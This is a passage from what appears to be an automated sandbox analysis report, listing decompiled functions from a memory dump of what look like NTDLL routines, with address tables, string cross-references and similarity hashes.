				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01700BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01743706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0170FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01743540;
						E0170FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0171DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01750C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E017097C0();
					}
					return E0170B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01743971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01743884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0170FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01709650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01743787(_a4,  &_v352, _t80);
						}
					}
					L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01743552
0x0174355a
0x0174355d
0x01743566
0x01743567
0x0174357e
0x0174358f
0x017435a1
0x017435a5
0x0174366b
0x0174366b
0x0174366d
0x01743672
0x01743679
0x01743685
0x0174368d
0x0174369d
0x017436a7
0x017436b8
0x017436c6
0x017436c7
0x017436dc
0x017436e1
0x017436e7
0x017436e9
0x017436e9
0x01743703
0x01743703
0x017435b5
0x017435c0
0x017435c4
0x00000000
0x00000000
0x017435ca
0x017435d7
0x017435e2
0x017435e6
0x017435e8
0x017435f5
0x017435fa
0x01743603
0x01743604
0x01743609
0x0174360a
0x01743612
0x01743613
0x0174361e
0x01743622
0x01743628
0x0174362f
0x0174362f
0x01743636
0x01743638
0x0174363b
0x01743642
0x01743642
0x01743636
0x01743657
0x01743657
0x0174365c
0x01743662
0x01743669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0174358F

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: b4df506d0a16aa740bae04fb8b33c650724228c96e9713a992864dcea7382e33
Instruction ID: 1c9bc70810fea6f5cde573605a39414d444f9ca627a97af5e7ee48b8d9b4bf87
Opcode Fuzzy Hash: b4df506d0a16aa740bae04fb8b33c650724228c96e9713a992864dcea7382e33
Instruction Fuzzy Hash: F54133B190162D9BDB21DA50CC84FEEF77CAB54714F1045A5EA09AB281DB309E888F95

Uniqueness

Uniqueness Score: -1.00%

Function 017905AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E017905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E017907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01709730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0178A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0178A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01791293(_t79, _v40, E017907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E016E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0178138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x017905c5
0x017905ca
0x017905d3
0x017906db
0x017906db
0x017906dd
0x017906e3
0x017906e3
0x017905dd
0x017905e7
0x017905f6
0x01790600
0x01790607
0x01790610
0x01790615
0x0179061a
0x0179061c
0x0179061e
0x01790624
0x01790625
0x01790627
0x01790628
0x01790631
0x01790640
0x0179064d
0x01790654
0x01790654
0x01790631
0x0179066d
0x01790674
0x00000000
0x00000000
0x01790692
0x0179069e
0x017906b0
0x017906a0
0x017906a9
0x017906a9
0x017906b8
0x017906d6
0x017906d6
0x00000000

Strings

`, xrefs: 01790633

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: af2885b22932d3cf499a969ed768ef4fba1c7fe10bf6315f43c92483c8c9e63a
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 9731E232214306ABEB10DE28DD44F9ABBDDABC4754F144229FA58DB280D770E918CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01743884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01743884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01709650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L016E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01709650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01743893
0x01743896
0x01743899
0x0174389f
0x017438a0
0x017438a4
0x017438a9
0x017438ac
0x017438ad
0x017438ae
0x017438af
0x017438b1
0x017438b4
0x017438bb
0x017438bc
0x017438bd
0x017438c4
0x017438c8
0x017438ca
0x017438ca
0x017438d5
0x0174393e
0x01743940
0x01743942
0x01743952
0x01743954
0x01743961
0x01743961
0x01743967
0x0174396e
0x0174396e
0x01743947
0x0174394c
0x00000000
0x0174394c
0x017438ea
0x017438ee
0x017438f8
0x017438f9
0x017438ff
0x01743900
0x01743902
0x01743903
0x0174390b
0x0174390f
0x01743950
0x00000000
0x01743950
0x01743915
0x0174391d
0x0174391d
0x01743922
0x01743926
0x00000000
0x01743928
0x0174392b
0x0174392b
0x01743935
0x01743937
0x01743937
0x00000000
0x01743935
0x01743926
0x017438f0
0x00000000

Strings

BinaryName, xrefs: 017438B4

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 1f7e3ebc2f8cdda4e5082fdd3948b5fe3f0155af31a8bd5289b99757821521b2
Instruction ID: dc75a3a10894c06ca6c54889e70afe733f8e2dbe30c1872b7e67cd193200f4bb
Opcode Fuzzy Hash: 1f7e3ebc2f8cdda4e5082fdd3948b5fe3f0155af31a8bd5289b99757821521b2
Instruction Fuzzy Hash: 1931E53690162ABFEB15DA58C945D7BFBB4FB40724F014169E919A7291D7309E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 016FD294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E016FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x17bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E016E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0170B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017095D0();
					L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x016fd29c
0x016fd2a6
0x016fd2b1
0x016fd2b5
0x016fd2b6
0x016fd2bc
0x016fd2bd
0x016fd2be
0x016fd2bf
0x016fd2c2
0x016fd2c4
0x016fd2cc
0x016fd384
0x016fd34b
0x016fd34f
0x016fd350
0x016fd351
0x016fd35c
0x016fd35c
0x016fd2d6
0x016fd2da
0x016fd2e1
0x016fd361
0x016fd369
0x016fd36d
0x016fd2e3
0x016fd2e3
0x016fd2e3
0x016fd2e5
0x016fd2ed
0x016fd2f5
0x016fd2fa
0x016fd302
0x016fd303
0x016fd30b
0x016fd30f
0x016fd313
0x016fd318
0x016fd31c
0x016fd320
0x016fd379
0x016fd37d
0x00000000
0x00000000
0x0173affe
0x0173b001
0x0173b011
0x00000000
0x016fd322
0x016fd322
0x016fd330
0x016fd337
0x016fd35d
0x016fd339
0x016fd33f
0x016fd38c
0x016fd38c
0x016fd33f
0x016fd349
0x00000000
0x016fd349

Strings

@, xrefs: 016FD303

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9391cd9b7c1939049da14f4529a6a988965b06f129a75590497b0fb5b50be4f1
Instruction ID: fd6a597af019267097262589b9995cd34014a7bf354ae686ce685f7a76dc21b8
Opcode Fuzzy Hash: 9391cd9b7c1939049da14f4529a6a988965b06f129a75590497b0fb5b50be4f1
Instruction Fuzzy Hash: 29318DB25493059FC721DF68CC84A6BBBE8EB86654F00092EFB9483251D735ED05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 016D1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E016D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0170BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0170A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0170A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L016E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x016d1b8f
0x016d1b9a
0x016d1b9c
0x016d1b9e
0x016d1ba3
0x01727010
0x01727010
0x00000000
0x016d1ba9
0x016d1ba9
0x016d1bae
0x00000000
0x016d1bc5
0x016d1bca
0x016d1bcf
0x016d1bd0
0x016d1bd1
0x016d1bd2
0x016d1bd6
0x016d1bdc
0x016d1be0
0x01726ffc
0x01727000
0x00000000
0x01727006
0x01727009
0x01727009
0x016d1be6
0x016d1bec
0x016d1c0b
0x016d1c0b
0x016d1c0c
0x016d1c11
0x016d1c12
0x016d1c15
0x016d1c1b
0x016d1c1f
0x016d1c31
0x016d1c33
0x01727026
0x01727026
0x016d1c21
0x016d1c24
0x016d1c24
0x016d1bee
0x016d1bee
0x016d1bf2
0x016d1c3a
0x016d1bf4
0x016d1bf4
0x016d1c05
0x016d1c05
0x016d1c09
0x016d1c3e
0x00000000
0x00000000
0x00000000
0x016d1c09
0x016d1bec
0x016d1be0
0x016d1bae
0x016d1c2e

Strings

WindowsExcludedProcs, xrefs: 016D1BC5

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 8f9ec34486a9c24fc1b8eb0bdc5835c85809b7bf29e6fd23df594c18b090c9f4
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 2121077AA01229ABDB329B59CD44F6BBBADEF52650F054425FE049B200D778DD02D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 016EF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E016EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x016ef71d
0x016ef722
0x016ef726
0x01734770
0x016ef765
0x016ef769
0x016ef769
0x016ef732
0x0173477a
0x00000000
0x0173477a
0x016ef738
0x016ef73a
0x016ef73c
0x016ef73f
0x016ef746
0x016ef778
0x016ef7a9
0x016ef7a9
0x016ef754
0x016ef75a
0x016ef75d
0x016ef75f
0x016ef761
0x016ef76f
0x016ef771
0x016ef771
0x016ef76f
0x016ef763
0x00000000
0x016ef763
0x016ef77d
0x016ef7a3
0x016ef7a5
0x00000000
0x016ef7a5
0x016ef77f
0x016ef782
0x016ef784
0x016ef786
0x00000000
0x00000000
0x00000000
0x016ef788
0x016ef748
0x016ef74d
0x016ef78d
0x016ef793
0x016ef7b7
0x016ef7bc
0x00000000
0x016ef7bc
0x016ef798
0x00000000
0x00000000
0x016ef79d
0x016ef7b0
0x00000000
0x016ef7b0
0x016ef79f
0x00000000
0x016ef74f
0x016ef74f
0x00000000
0x016ef74f

Strings

Actx , xrefs: 016EF73F

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 350714a82a8b206b6e5c60e28bb3af2a57e1436cc940b872d3d53e7008d7d61e
Instruction ID: dd45764333f4ce9da781eade72f0820ac5793b68cda99b198f69a2dabd48e6ed
Opcode Fuzzy Hash: 350714a82a8b206b6e5c60e28bb3af2a57e1436cc940b872d3d53e7008d7d61e
Instruction Fuzzy Hash: 7711E6343966028BEF254E1CAC9873676D6EB85224F2547AAE862CB391D770CC42C340

Uniqueness

Uniqueness Score: -1.00%

Function 01778DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01778DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x17a0d50);
				E0171D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01755720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0171DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0171DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0171D130(_t34, _t39, _t40);
			}

0x01778df1
0x01778df1
0x01778df1
0x01778df1
0x01778df1
0x01778df1
0x01778df3
0x01778df8
0x01778dfd
0x01778e00
0x01778e0e
0x01778e2a
0x01778e36
0x01778e38
0x01778e3c
0x01778e46
0x01778e46
0x01778e36
0x01778e50
0x01778e56
0x01778e59
0x01778e5c
0x01778e60
0x01778e67
0x01778e6d
0x01778e73
0x01778e74
0x01778eb1
0x01778ebd

Strings

Critical error detected %lx, xrefs: 01778E21

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: ec2f36361e26e63b248c486f14a30deecf7daf8e8e532c2f12f1f339494b32c1
Instruction ID: 75840c3fbe569e6612d6be3a650d76e660b55efffcba4ab29b9fc1061b9cd87d
Opcode Fuzzy Hash: ec2f36361e26e63b248c486f14a30deecf7daf8e8e532c2f12f1f339494b32c1
Instruction Fuzzy Hash: BB1139B1D14348EADF25CFA8C9097DCFBB0AB18315F24465DE5296B286C3B40601CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0175FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0175FF60

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 713f2da94574c9fa6c96e805f7ff98b8023bf0b05b725138824d95aca079f71d
Instruction ID: 0decf97ebad0c16ecc271fd8d3118d1e116cd883a646843a969a02923742c12f
Opcode Fuzzy Hash: 713f2da94574c9fa6c96e805f7ff98b8023bf0b05b725138824d95aca079f71d
Instruction Fuzzy Hash: E5110471910144EFDB62DB54CC8CF98FBB1FF08714F148458F904676A5C7B99940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01795BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e924ad10d431bcf2d6bab801ec492cd3f94c783f231d9a6b0577fee54706a8
Instruction ID: 08757b385b16924811a57939537d211e11fa1461e25b213f1b513c55642850f4
Opcode Fuzzy Hash: e0e924ad10d431bcf2d6bab801ec492cd3f94c783f231d9a6b0577fee54706a8
Instruction Fuzzy Hash: C8425A75900229CFDB25CF68D880BA9FBB1FF49314F1581EAE94DAB242D7349989CF50

Uniqueness

Uniqueness Score: -1.00%

Function 016E4120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24264b1b3d5e0ede9bfc8419823fca6fa0e2e7eb6c7344aa0eafd22cf02c9804
Instruction ID: 2e4d44f8d2d956bbc200a0ba5a585024a106a787b8455cdef9402c6bbeec7367
Opcode Fuzzy Hash: 24264b1b3d5e0ede9bfc8419823fca6fa0e2e7eb6c7344aa0eafd22cf02c9804
Instruction Fuzzy Hash: C8F16F706092118FD714CF29C888A7AB7E1EF99714F154A2EF586CB391EB34D942CB52

Uniqueness

Uniqueness Score: -1.00%

Function 016F20A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be36bfc5617d1c3cffacdc7437450fa23eeafc2d499781ccdb62ef5cf8783cb6
Instruction ID: 129349620bf6b61b8ed9bab474bafa99aa487049f3f3a7f86e0d00174477e540
Opcode Fuzzy Hash: be36bfc5617d1c3cffacdc7437450fa23eeafc2d499781ccdb62ef5cf8783cb6
Instruction Fuzzy Hash: 8AF1C175A083419FD726CB2CCC90B6ABBE6AFC5324F04851DEA959B382D735D841CF86

Uniqueness

Uniqueness Score: -1.00%

Function 016DD5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f9aac0cfab091ba91f3a86c417bfdeb38102f52aa70aec9d795451e686e88e
Instruction ID: d614d6263d156a2b0d7d0d25758ff9cc2ca9662324bd3546a0a2964e07c41d4b
Opcode Fuzzy Hash: 03f9aac0cfab091ba91f3a86c417bfdeb38102f52aa70aec9d795451e686e88e
Instruction Fuzzy Hash: EEE1AF30E0036A8FEB35AF68CC94BB9BBB2BF45314F0541D9D909972D1D734A982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 016D849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15b762a7223b645cb9bc0967ce8b6c9ab5db1e0a2af50f14605e9837286c071
Instruction ID: c54561c110d62e6ab3f7a74ce2c39b29f1f82bac88e57f8f603962d067a17c7b
Opcode Fuzzy Hash: a15b762a7223b645cb9bc0967ce8b6c9ab5db1e0a2af50f14605e9837286c071
Instruction Fuzzy Hash: 00B13B70E00259DFDB29DF99CD88AAEFBBABF48314F14412DE505AB345D770A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016F513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b446e9ee03dab5cd6954f509dff6119389c9ac074b0aceb36c6eeed08c38485a
Instruction ID: 0b71acb551d4b71372924c62b32909cb67873e827090599e5bf1ada2a76e66ee
Opcode Fuzzy Hash: b446e9ee03dab5cd6954f509dff6119389c9ac074b0aceb36c6eeed08c38485a
Instruction Fuzzy Hash: 32C132755093819FD354CF28C880A5AFBF1BF88304F188A6EF9998B352D771E985CB52

Uniqueness

Uniqueness Score: -1.00%

Function 016F03E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f89c6b04ebc106531138958ad6ffadec51760dbb1bcf79bf7fe05c070b1aeb2f
Instruction ID: b13262c46b53466a8a29bc4a638982b89c7d11c2791e2cbf2bba6d216e2a921f
Opcode Fuzzy Hash: f89c6b04ebc106531138958ad6ffadec51760dbb1bcf79bf7fe05c070b1aeb2f
Instruction Fuzzy Hash: F0912731E01215EBEB369B6CCC48BADBBA5AB45724F050269FB12A72D3D7749D40C781

Uniqueness

Uniqueness Score: -1.00%

Function 016CC600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

